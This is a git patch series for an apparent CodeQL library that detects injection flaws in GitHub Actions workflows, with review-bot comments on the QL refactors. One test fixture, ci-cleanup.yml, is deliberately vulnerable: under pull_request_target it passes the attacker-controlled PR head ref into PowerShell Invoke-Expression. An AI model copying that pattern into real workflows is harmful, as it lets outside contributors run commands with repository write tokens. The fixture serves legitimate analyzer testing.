10:17:54] Trimming disk cache at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml/default/cache in mode trim. -[2024-02-03 10:17:54] Sequence stamp origin is -6222583518558519910 -[2024-02-03 10:17:54] Pausing evaluation to zealously trim disk at sequence stamp o+0 -[2024-02-03 10:17:54] Unpausing evaluation -[2024-02-03 10:17:54] Trimming completed (2ms): Trimmed disposable data from cache. 
-[2024-02-03 10:17:54] Pausing evaluation to close the cache at sequence stamp o+1 -[2024-02-03 10:17:54] The disk cache is freshly trimmed; leave it be. -[2024-02-03 10:17:54] Unpausing evaluation -[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Trimmed disposable data from cache. -[2024-02-03 10:17:54] [PROGRESS] dataset cleanup> Finalizing dataset in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml -[2024-02-03 10:17:54] [DETAILS] dataset cleanup> Finished deleting ID pool from /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/db-yaml (4ms). -[2024-02-03 10:17:54] Plumbing command codeql dataset cleanup completed. -[2024-02-03 10:17:54] Plumbing command codeql database cleanup completed with status 0. -[2024-02-03 10:17:54] [PROGRESS] database finalize> Finished zipping source archive (3.73 KiB). -[2024-02-03 10:17:54] Plumbing command codeql database finalize completed. -[2024-02-03 10:17:54] [PROGRESS] database create> Successfully created database at /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db. -[2024-02-03 10:17:54] Terminating normally. diff --git a/ql/src/test-db/log/database-index-files-20240203.101752.962.log b/ql/src/test-db/log/database-index-files-20240203.101752.962.log deleted file mode 100644 index f410634a29f..00000000000 --- a/ql/src/test-db/log/database-index-files-20240203.101752.962.log +++ /dev/null 
@@ -1,21 +0,0 @@ -[2024-02-03 10:17:52] This is codeql database index-files --include-extension=.yaml --include-extension=.yml --size-limit=5m --language=yaml /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db -[2024-02-03 10:17:52] Log file was started late. -[2024-02-03 10:17:52] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. -[2024-02-03 10:17:52] [PROGRESS] database index-files> Scanning for files in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... -[2024-02-03 10:17:52] Calling plumbing command: codeql resolve files --include-extension=.yaml --include-extension=.yml --size-limit=5m /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test --format=json -[2024-02-03 10:17:53] [PROGRESS] resolve files> Scanning /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... -[2024-02-03 10:17:53] Plumbing command codeql resolve files completed: - [ - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/changed-files.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/inter1.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/test.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/no-flow1.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/no-flow2.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/simple1.yml", - "/Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test/simple2.yml" - ] -[2024-02-03 10:17:53] [DETAILS] database index-files> Found 7 files. -[2024-02-03 10:17:53] [PROGRESS] database index-files> /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db: Indexing files in in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test... 
-[2024-02-03 10:17:53] Using index-files script /Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh. -[2024-02-03 10:17:53] [PROGRESS] database index-files> Running command in /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test: [/Users/pwntester/.local/share/gh/extensions/gh-codeql/dist/release/v2.16.1/yaml/tools/index-files.sh, /Users/pwntester/seclab/projects/actions/codeql-actions/ql/src/test-db/working/files-to-index11251721875757902238.list] -[2024-02-03 10:17:53] Terminating normally. 
diff --git a/ql/src/test-db/src.zip b/ql/src/test-db/src.zip deleted file mode 100644 index 9c82ac3a64444a993e3a461dc000184a22d1e3a8..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 3816 zcmcImc{r4N8y@S7B{SK=NTkh#nL(1VrA-ZHjHS`3oUF~53^Qa2O^Bj=jVy6c985U& zeHn+5eG6p`2PGa)KF_JzvD?24Noy;#teq+~c`=vh_tIRa?!WW!^|NG ziWLj;R3$WF@PRVmbLC@G8WJxWF2*{5-xFje*R*S{jZdE!ql66TQQ9{;;m$p;g*`U? zCf-^uQULUp%4!G#7t#!jL?f3H3JPDSywe@G3Sk`M`KxcmY65Byc)29G{#GqkqAbEv z_ng;paJl96up=4?$D13oqYYH=$tX04R*c*Yqk$xLHp8l3-mDwm4Uu{KMEcU^u3gX# z!xx#WWf>W7TI-dIB}04f1e(e4t>hI9z8ue)cz6qw6;6Lea%lDGDGZNGtG7AwAL;$d z_%CBH?e2xzWTU{3A2;RQO(K$7&6u6jm%dyH!x!`u;{Dg>`{LVY3IL9DTDgZg^N#94 z*CqE@WSSR{BO3LW9ZYSuXr(_D4YNI>xsX*HNo3EjvRPtlOoI>*=JMeK_F|@4QW#A) zyUM2rb*sJ2f0fL5u3(%Q5_PjAHz+qmGr^lY{2oe?39in9*jVIC0!V8~wQDN^2>ynM zy$2&}R^(CRbS56Lr1de1U%sYC<`E08@P{s~x>3f*T;I|9x)Y47^e!PQGxe_1vm|wi zb4$N_v@O(XE<5{WmIzv1+7Z&i7kB42ZWOGYb3x-%dU93CdT735FUBS2*P-Ps)=2wm zM)50TTmFfn0hpjaDABSoHti&64$R>kVNKRrW;2?|=KbG|vb~(EajfD;$B8>eN*?qce$ue!L(J+@SJcsb!3LQK2&|CQ38rj9$My9!!WL8M7K2DVLhA zSHeZ$_miDJgeu@rV=2`E4`4*6+IZckS!lPs8`^&Ymb827AY2lsEW;u$m@0PgrzWnR z<`F+XIW?JY;M#PU_2B)Kn_@QqY5)GZJsTL}t8nbGkmiaBxiBD;>qx$D`+~238nQ0h zaQ0EJH=L^bL-{6)K6o0m3*?rv^pObUHz{yS3n9NvtUa3fEWg-iQL2NM!zq;v92kgeCd_Oa$Z2Xx)n=E4=#)}}a*w7AZFMEF=}qop6) za0L9AouzYg%1HQ}>K$v5(#jyc`WRW?<9tpn3C!|jR zNaAL1osGGZI}M1W>$WD{Bo8jhChyDekBPhiC92@lAf5TjO5i=@ikX8=lgk2{Heh%O zR9K?BeN>{LbmxgpX+q+|Qt8-QT5dM*%|>*{gy9R>;=xftjm-tdIc2BV; z-O9&+8>eCsiLz~Pq+%>5%y6BYNyKtJ=8$#+>+qZyg zTx01;?Jbr*$VUX>PK}fB5BQ6yN~#qNRQ~GWXXoxo8r(Iryl97ZIn>ujcv3Y6x_x+Y zQA$O=^tA+Q5<2PDlEbaWOc}#$f=L%cu-d>>&o*7j9X>q76n|K#ty|j8I-=^-r@kJX z0=N@eVXe20T1U`mQ=J@m=}$tJwN9xMqL8a@GhqyeZ!XI zei0gIM00*jBIy)G2jAaso_FZtBjf7nw%O>C%zmG|3wqhn+2$sllbcGRB`@jL^EG;J z`n}cVWRV(VXQ#Oi?_=eaJ-O+Y5s7?I# Date: Mon, 5 Feb 2024 10:48:53 +0100 Subject: [PATCH 0005/1267] Add testproj to gitignore --- .gitignore | 1 + 1 file changed, 1 insertion(+) 
diff --git a/.gitignore b/.gitignore index e43b0f98895..1233930f4a4 100644 --- a/.gitignore +++ b/.gitignore @@ -1 +1,2 @@ .DS_Store +**/*.testproj From 3902a55fbba9a86b3a85113196f3c219f29428ca Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 10:52:17 +0100 Subject: [PATCH 0006/1267] Update build test db script --- build-dbs.sh | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/build-dbs.sh b/build-dbs.sh index dac4753f4d6..073fcc40b44 100755 --- a/build-dbs.sh +++ b/build-dbs.sh @@ -1,5 +1,5 @@ #!/bin/bash -rm -rf ql/src/test-db || true -rm -rf ql/lib/test-db || true -codeql database create ql/src/test-db -l yaml -s ql/src/test -codeql database create ql/lib/test-db -l yaml -s ql/lib/test +rm -rf ql/src/test/test.testproj || true +rm -rf ql/lib/test/test.testproj || true +codeql database create ql/src/test/test.testproj -l yaml -s ql/src/test +codeql database create ql/lib/test/test.testproj -l yaml -s ql/lib/test From b3eae71f951733ff4a13828d37ed6977c7e92392 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 13:30:46 +0100 Subject: [PATCH 0007/1267] fix test --- ql/src/test/test.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/src/test/test.yml b/ql/src/test/test.yml index 8f9cbf3b644..554a09f2105 100644 --- a/ql/src/test/test.yml +++ b/ql/src/test/test.yml @@ -18,6 +18,7 @@ jobs: - id: step1 env: BODY: ${{ steps.step0.outputs.value}} + shell: powershell run: | Write-Output "::set-output name=MSG::$ENV{BODY}" - id: step2 From 0398fbd0d71cd0b456236c93154d92b07521a939 Mon Sep 17 00:00:00 2001 
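Review bot: build-dbs.sh has no error handling, so if the first `codeql database create` fails the second still runs and the exit status reflects only the last command. Adding `set -euo pipefail` directly under the shebang would make a failed database build visible to the caller. The `|| true` after each `rm -rf` is redundant, since `-f` already treats a missing path as a non-error.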
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 18:04:37 +0100 Subject: [PATCH 0008/1267] Refactor AST layer --- ql/lib/codeql/actions/Ast.qll | 202 ++++++++---------- .../actions/controlflow/internal/Cfg.qll | 63 +++--- .../codeql/actions/dataflow/FlowSources.qll | 24 +-- .../dataflow/internal/DataFlowPrivate.qll | 5 +- 4 files changed, 140 insertions(+), 154 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 967a969a6b7..d2c7fdd4501 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -1,37 +1,49 @@ private import codeql.actions.ast.internal.Actions private import codeql.Locations +/** + * Base class for the AST tree. + * Based on YamlNode from the Yaml library but making mapping values children of the mapping keys: + * eg: top: + * key: value + * According to the Yaml library, both `key` and `value` are direct children of `top` + * This Tree implementation makes `key` child od `top` and `value` child of `key` + */ class AstNode instanceof YamlNode { - AstNode getParentNode() { - if exists(YamlMapping m | m.maps(_, this)) - then exists(YamlMapping m | m.maps(result, this)) - else result = super.getParentNode() - } + AstNode getParentNode() { result = super.getParentNode() } - AstNode getAChildNode() { - if this instanceof YamlMapping - then this.(YamlMapping).maps(result, _) - else - if this instanceof YamlCollection - then result = super.getChildNode(_) - else - if this instanceof YamlScalar and exists(YamlMapping m | m.maps(this, _)) - then exists(YamlMapping m | m.maps(this, result)) - else none() - } - - AstNode getChildNodeByOrder(int i) { - result = - rank[i](Expression child, Location l | - child = this.getAChildNode() and - child.getLocation() = l - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) - } + // AstNode getParentNode() { + // if exists(YamlMapping m | m.maps(_, this)) + // then exists(YamlMapping m | m.maps(result, this)) + // else result = super.getParentNode() + // } + AstNode getAChildNode() { result = super.getAChildNode() } + // AstNode getAChildNode() { + // if this instanceof YamlMapping + // then this.(YamlMapping).maps(result, _) + // else + // if this instanceof YamlCollection + // then result = super.getChildNode(_) + // else + // if this instanceof YamlScalar and exists(YamlMapping m | m.maps(this, _)) + // then exists(YamlMapping m | m.maps(this, result)) + // else none() + // } + // /** + // * This should be getAChildNode(int i) + // */ + // 
AstNode getChildNodeByOrder(int i) { + // result = + // rank[i](Expression child, Location l | + // child = this.getAChildNode() and + // child.getLocation() = l + // | + // child + // order by + // l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + // ) + // } string toString() { result = super.toString() } string getAPrimaryQlClass() { result = super.getAPrimaryQlClass() } @@ -39,15 +51,24 @@ class AstNode instanceof YamlNode { Location getLocation() { result = super.getLocation() } } -class Statement extends AstNode { - // narrow down to something that is a statement - // A statement is a group of expressions and/or statements that you design to carry out a task or an action. - // Any statement that can return a value is automatically qualified to be used as an expression. -} +/** + * A statement is a group of expressions and/or statements that you design to carry out a task or an action. + * Any statement that can return a value is automatically qualified to be used as an expression. + */ +class Statement extends AstNode { } -class Expression extends Statement { - // narrow down to something that is an expression - // An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. +/** + * An expression is any word or group of words or symbols that is a value. In programming, an expression is a value, or anything that executes and ends up being a value. + */ +class Expression extends Statement { } + +/** + * A Github Actions Workflow + */ +class WorkflowStmt extends Statement instanceof Actions::Workflow { + JobStmt getAJob() { result = super.getJob(_) } + + JobStmt getJob(string id) { result = super.getJob(id) } } /** 
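Review bot: The new doc comment on `AstNode` says this tree makes `key` a child of `top` and `value` a child of `key`, but the code added below it delegates `getParentNode()` and `getAChildNode()` straight to `super`, with the mapping-aware versions left commented out. As written, the comment describes behaviour the class no longer has. Either reword it to say the YamlNode parent/child relation is used unchanged, or restore the reparenting. The three commented-out predicates are better deleted than kept in the class body, and `child od` should read `child of`.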
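Review bot: `Statement` and `Expression` are declared with empty bodies in the second Ast.qll hunk, so neither has a characteristic predicate and every `AstNode` belongs to both. The doc comments that replace the old `narrow down to ...` placeholders describe a distinction the classes do not enforce. I would keep a marker such as `// TODO: no characteristic predicate yet, currently matches every AstNode` until they are narrowed. Without it, `rank[i](Expression child, ...)` in Cfg.qll reads as a filter when it is not one.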
@@ -60,19 +81,17 @@ class JobStmt extends Statement instanceof Actions::Job { */ string getId() { result = super.getId() } - /** Gets the human-readable name of this job, if any, as a string. */ - string getName() { - result = super.getId() - or - not exists(string s | s = super.getId()) and result = "unknown" - } - /** Gets the step at the given index within this job. */ StepStmt getStep(int index) { result = super.getStep(index) } /** Gets any steps that are defined within this job. */ StepStmt getAStep() { result = super.getStep(_) } + /** + * Gets a needed job. + * eg: + * - needs: [job1, job2] + */ JobStmt getNeededJob() { exists(Actions::Needs needs | needs.getJob() = this and 
@@ -80,34 +99,35 @@ class JobStmt extends Statement instanceof Actions::Job { ) } - Expression getJobOutputExpr(string varName) { - this.(Actions::Job) - .lookup("outputs") - .(YamlMapping) - .maps(any(YamlScalar a | a.getValue() = varName), result) - } - - JobOutputStmt getJobOutputStmt() { result = this.(Actions::Job).lookup("outputs") } - - Statement getSuccNode(int i) { - result = - rank[i](Expression child, Location l | - (child = this.getAStep() or child = this.getJobOutputStmt()) and - l = child.getLocation() - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) - } + /** + * Gets the declaration of the outputs for the job. + * eg: + * out1: ${steps.foo.bar} + * out2: ${steps.foo.baz} + */ + JobOutputStmt getOutputStmt() { result = this.(Actions::Job).lookup("outputs") } } +/** + * Declaration of the outputs for the job. + * eg: + * out1: ${steps.foo.bar} + * out2: ${steps.foo.baz} + */ class JobOutputStmt extends Statement instanceof YamlMapping { JobStmt job; JobOutputStmt() { job.(YamlMapping).lookup("outputs") = this } - StepOutputAccessExpr getSuccNode(int i) { result = this.(YamlMapping).getValueNode(i) } + YamlMapping asYamlMapping() { result = this } + + /** + * Gets a specific value expression + * eg: ${steps.foo.bar} + */ + Expression getOutputExpr(string id) { + this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = id), result) + } } /** @@ -116,15 +136,7 @@ class JobOutputStmt extends Statement instanceof YamlMapping { class StepStmt extends Statement instanceof Actions::Step { string getId() { result = super.getId() } - string getName() { - result = super.getId() - or - not exists(string s | s = super.getId()) and result = "unknown" - } - JobStmt getJob() { result = super.getJob() } - - abstract AstNode getSuccNode(int i); } /** 
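Review bot: The examples in the new doc comments for `getOutputStmt`, `JobOutputStmt` and `getOutputExpr` write the values as `${steps.foo.bar}`, which is not the workflow expression form used elsewhere in this file (`${{ steps.changed-files.outputs.all_changed_files }}`). Since these classes exist to match that syntax, I would write the examples as `out1: ${{ steps.foo.outputs.bar }}` so the comment shows a value the library would actually see.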
@@ -145,44 +157,12 @@ class UsesExpr extends StepStmt, Expression { result = with.lookup(key) ) } - - Expression getArgumentByOrder(int i) { - exists(Actions::With with | - with.getStep() = uses.getStep() and - result = - rank[i](Expression child, Location l | - child = with.lookup(_) and l = child.getLocation() - | - child - order by - l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() - ) - ) - } - - Expression getAnArgument() { - exists(Actions::With with | - with.getStep() = this and - result = with.lookup(_) - ) - } - - override AstNode getSuccNode(int i) { result = this.getArgumentByOrder(i) } } /** - * An argument passed to a UsesExpr. + * A Run step represents the evaluation of a provided script */ -class ArgumentExpr extends Expression { - UsesExpr uses; - - ArgumentExpr() { this = uses.getAnArgument() } -} - -/** - * A Run step represents a call to an inline script or executable on the runner machine. - */ -class RunExpr extends StepStmt { +class RunExpr extends StepStmt, Expression { Actions::Run scriptExpr; RunExpr() { scriptExpr.getStep() = this } @@ -190,12 +170,10 @@ class RunExpr extends StepStmt { Expression getScriptExpr() { result = scriptExpr } string getScript() { result = scriptExpr.getValue() } - - override AstNode getSuccNode(int i) { result = this.getScriptExpr() and i = 0 } } /** - * A YAML string containing a workflow expression. + * Evaluation of a workflow expression ${{}}. */ class ExprAccessExpr extends Expression instanceof YamlString { string expr; @@ -208,7 +186,7 @@ class ExprAccessExpr extends Expression instanceof YamlString { } /** - * A ExprAccessExpr where the expression references a step output. + * A ExprAccessExpr where the expression evaluated is a step output read. * eg: `${{ steps.changed-files.outputs.all_changed_files }}` */ class StepOutputAccessExpr extends ExprAccessExpr { 
@@ -230,7 +208,7 @@ class StepOutputAccessExpr extends ExprAccessExpr { } /** - * A ExprAccessExpr where the expression references a job output. + * A ExprAccessExpr where the expression evaluated is a job output read. * eg: `${{ needs.job1.outputs.foo}}` */ class JobOutputAccessExpr extends ExprAccessExpr { @@ -250,7 +228,7 @@ class JobOutputAccessExpr extends ExprAccessExpr { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - job.getJobOutputExpr(varName) = result + job.getOutputStmt().getOutputExpr(varName) = result ) } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 8b6696fe777..c549eb40198 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll 
@@ -139,31 +139,40 @@ private import CfgImpl private import Completion private import CfgScope -// Trees are what end up creating Cfg::Node objects and therefore DataFlow::Node objects. -// Its also required that there is parent/child relationships between nodes so orphans nodes will not appear as either Cfg::Node or DataFlow::Node. -// For example -// - ArgumentExpr should be children of UsesExpr, and UsesExpr should be children of StepStmt. -// TODO: We need to make VarAccess expressions part ot the tree as they are currently orphans -private class CfgNodeTree extends StandardPreOrderTree instanceof AstNode { - override AstNode getChildNode(int i) { result = super.getChildNodeByOrder(i) } +private class JobTree extends StandardPreOrderTree instanceof JobStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + (child = super.getAStep() or child = super.getOutputStmt()) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } } -// private class JobStmtTree extends StandardPreOrderTree instanceof JobStmt { -// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } -// } -// -// private class StepStmtTree extends StandardPreOrderTree instanceof StepStmt { -// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } -// } -// -// private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStmt { -// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } -// } -// -// // TODO: Do we need this or we can just care about the ExprAccessExpr -// private class ArgumentTree extends LeafTree instanceof ArgumentExpr { } -// -// private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { } -// -// private class StepOutputAccessTree extends LeafTree instanceof StepOutputAccessExpr { } -// -// private class JobOutputAccessTree extends 
LeafTree instanceof JobOutputAccessExpr { } \ No newline at end of file + +private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStmt { + override ControlFlowTree getChildNode(int i) { result = super.asYamlMapping().getValueNode(i) } +} + +private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getArgument(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class RunTree extends StandardPreOrderTree instanceof RunExpr { + override ControlFlowTree getChildNode(int i) { result = super.getScriptExpr() and i = 0 } +} + +private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { } + diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 5ce82a134ce..b2ab51e28fa 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -19,18 +19,6 @@ abstract class RemoteFlowSource extends SourceNode { override string getThreatModel() { result = "remote" } } -private class ChangedFilesSource extends RemoteFlowSource { - ChangedFilesSource() { - exists(UsesExpr uses | - uses.getTarget() = "tj-actions/changed-files" and - uses.getVersion() = ["v1", "v20", "v30", "v40"] and - uses = this.asExpr() - ) - } - - override string getSourceType() { result = "User-controlled list of changed files" } -} - bindingset[context] private predicate isExternalUserControlledIssue(string context) { context.regexpMatch("\\bgithub\\s*\\.\\s*event\\s*\\.\\s*issue\\s*\\.\\s*title\\b") or 
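Review bot: None of the trees added in this Cfg.qll hunk gives a step's `env:` values a parent: `JobTree` lists the steps and the outputs mapping, `UsesTree` lists `getArgument(_)`, and `RunTree` lists only `getScriptExpr()`. The comment this hunk removes states that nodes without a parent in the tree never become CFG or data-flow nodes. As far as this hunk shows, an expression such as `BODY: ${{ steps.step0.outputs.value}}` under `env:` in ql/src/test/test.yml would therefore be invisible to taint tracking and produce a false negative. I would add the step's `env` values as children of `RunTree` and `UsesTree`, ordered by location like the arguments, or leave a `// TODO: env values are not yet part of the CFG` so the gap is tracked. The two `rank` expressions are also identical apart from the child set and could share one helper predicate.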
@@ -135,3 +123,15 @@ private class EventSource extends RemoteFlowSource { override string getSourceType() { result = "User-controlled events" } } + +private class ChangedFilesSource extends RemoteFlowSource { + ChangedFilesSource() { + exists(UsesExpr uses | + uses.getTarget() = "tj-actions/changed-files" and + uses.getVersion() = ["v10", "v20", "v30", "v40"] and + uses = this.asExpr() + ) + } + + override string getSourceType() { result = "User-controlled list of changed files" } +} diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 8b57ea2436e..9f028623848 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -97,8 +97,8 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof StepStmt - then result = this.(StepStmt).getName() - else result = this.(JobStmt).getName() + then result = this.(StepStmt).getId() + else result = this.(JobStmt).getId() } } @@ -295,4 +295,3 @@ predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preserves * This compression is normally done to not show SSA steps, casts, etc. */ predicate neverSkipInPathGraph(Node node) { any() } - From da2ac2af03bb73814a7727796312464cbf35f4d5 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 11:52:14 +0100 Subject: [PATCH 0009/1267] Process only .github/workflows yaml files --- ql/lib/codeql/actions/ast/internal/Actions.qll | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Actions.qll b/ql/lib/codeql/actions/ast/internal/Actions.qll index e3be61fd3b9..a11759b0c93 100644 --- a/ql/lib/codeql/actions/ast/internal/Actions.qll +++ b/ql/lib/codeql/actions/ast/internal/Actions.qll 
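Review bot: `uses.getVersion() = ["v10", "v20", "v30", "v40"]` in `ChangedFilesSource` is an exact-match list, so a workflow that references `tj-actions/changed-files` by any other tag, a branch or a commit SHA is not treated as a source. Queries built on `RemoteFlowSource` would then miss it. If the list is meant to name specific releases, say so on the class, e.g. `// Only these tags are modelled; other refs of the action are not treated as sources.` Otherwise drop the version constraint, or match on the tag prefix.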
@@ -19,9 +19,7 @@ module Actions { f = this.getLocation().getFile() and ( f.getRelativePath().regexpMatch("(^|.*/)\\.github/workflows/.*\\.ya?ml$") or - f.getBaseName() = ["action.yml", "action.yaml"] or - // ALVARO: Add any yaml files temporary for development - f.getExtension() = ["yml", "yaml"] + f.getBaseName() = ["action.yml", "action.yaml"] ) ) } From 1708e0f19d76f2feebc7cab3ecd81a0bc2b65878 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 8 Feb 2024 11:55:21 +0100 Subject: [PATCH 0010/1267] Move tests files to .github/workflows --- ql/lib/test/{ => .github/workflows}/test.yml | 0 .../{ => .github/workflows}/changed-files.yml | 0 ql/src/test/.github/workflows/ci-cleanup.yml | 47 ++++++++++++++ .../workflows/image_link_generator.yml | 55 +++++++++++++++++ .../workflows/image_link_generator_2.yml | 61 +++++++++++++++++++ .../workflows/image_link_generator_3.yml | 27 ++++++++ .../test/{ => .github/workflows}/inter1.yml | 0 .../test/{ => .github/workflows}/no-flow1.yml | 0 .../test/{ => .github/workflows}/no-flow2.yml | 0 .../test/{ => .github/workflows}/simple1.yml | 0 .../test/{ => .github/workflows}/simple2.yml | 0 ql/src/test/{ => .github/workflows}/test.yml | 0 12 files changed, 190 insertions(+) rename ql/lib/test/{ => .github/workflows}/test.yml (100%) rename ql/src/test/{ => .github/workflows}/changed-files.yml (100%) create mode 100644 ql/src/test/.github/workflows/ci-cleanup.yml create mode 100644 ql/src/test/.github/workflows/image_link_generator.yml create mode 100644 ql/src/test/.github/workflows/image_link_generator_2.yml create mode 100644 ql/src/test/.github/workflows/image_link_generator_3.yml rename ql/src/test/{ => .github/workflows}/inter1.yml (100%) rename ql/src/test/{ => .github/workflows}/no-flow1.yml (100%) rename ql/src/test/{ => .github/workflows}/no-flow2.yml (100%) rename ql/src/test/{ => .github/workflows}/simple1.yml (100%) rename ql/src/test/{ => .github/workflows}/simple2.yml (100%) rename ql/src/test/{ => .github/workflows}/test.yml (100%) diff --git a/ql/lib/test/test.yml b/ql/lib/test/.github/workflows/test.yml similarity index 100% rename from ql/lib/test/test.yml rename to ql/lib/test/.github/workflows/test.yml 
diff --git a/ql/src/test/changed-files.yml b/ql/src/test/.github/workflows/changed-files.yml similarity index 100% rename from ql/src/test/changed-files.yml rename to ql/src/test/.github/workflows/changed-files.yml diff --git a/ql/src/test/.github/workflows/ci-cleanup.yml b/ql/src/test/.github/workflows/ci-cleanup.yml new file mode 100644 index 00000000000..11a101cef49 --- /dev/null +++ b/ql/src/test/.github/workflows/ci-cleanup.yml 
@@ -0,0 +1,47 @@ +run-name: Cleanup ${{ github.head_ref }} +on: + pull_request_target: + types: labeled + paths: + - "images/**" + +jobs: + clean_ci: + name: Clean CI runs + runs-on: ubuntu-latest + permissions: + actions: write + steps: + - env: + GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} + shell: pwsh + run: | + $startDate = Get-Date -UFormat %s + $workflows = @("macos11", "macos12", "ubuntu2004", "ubuntu2204", "windows2019", "windows2022") + while ($true) { + $continue = $false + foreach ($wf in $workflows) { + $skippedCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status skipped --json databaseId" + $skippedIds = Invoke-Expression -Command $skippedCommand | ConvertFrom-Json | ForEach-Object { $_.databaseId } + $skippedIds | ForEach-Object { + $deleteCommand = "gh run delete --repo ${{ github.repository }} $_" + Invoke-Expression -Command $deleteCommand + } + $pendingCommand = "gh run list --workflow ${wf}.yml --branch ${{ github.event.pull_request.head.ref }} --repo ${{ github.repository }} --status requested --json databaseId --template '{{ . | len }}'" + $pending = Invoke-Expression -Command $pendingCommand + if ($pending -gt 0) { + Write-Host "Pending for ${wf}.yml: $pending run(s)" + $continue = $true + } + } + if ($continue -eq $false) { + Write-Host "All done, exiting" + break + } + $curDate = Get-Date -UFormat %s + if (($curDate - $startDate) -gt 60) { + Write-Host "Reached timeout, exiting" + break + } + Write-Host "Waiting 5 seconds..." + Start-Sleep -Seconds 5 diff --git a/ql/src/test/.github/workflows/image_link_generator.yml b/ql/src/test/.github/workflows/image_link_generator.yml new file mode 100644 index 00000000000..6239f0490d1 --- /dev/null +++ b/ql/src/test/.github/workflows/image_link_generator.yml 
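Review bot: Nothing in `ci-cleanup.yml` says which expressions the queries are expected to report. It expands `${{ github.event.pull_request.head.ref }}` into strings passed to `Invoke-Expression` under `pull_request_target` with `actions: write`, and uses `${{ github.head_ref }}` in `run-name`, but none of these lines is marked as an intended finding. The diffstat of this commit lists only `.yml` files, so unless expectations are kept elsewhere, a regression in the source or sink models would not be caught by these fixtures. A header comment such as `# Test fixture: pull_request.head.ref reaches the run script; expected to be reported` would record the intent. The same applies to `image_link_generator.yml` and `image_link_generator_3.yml` added in this commit.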
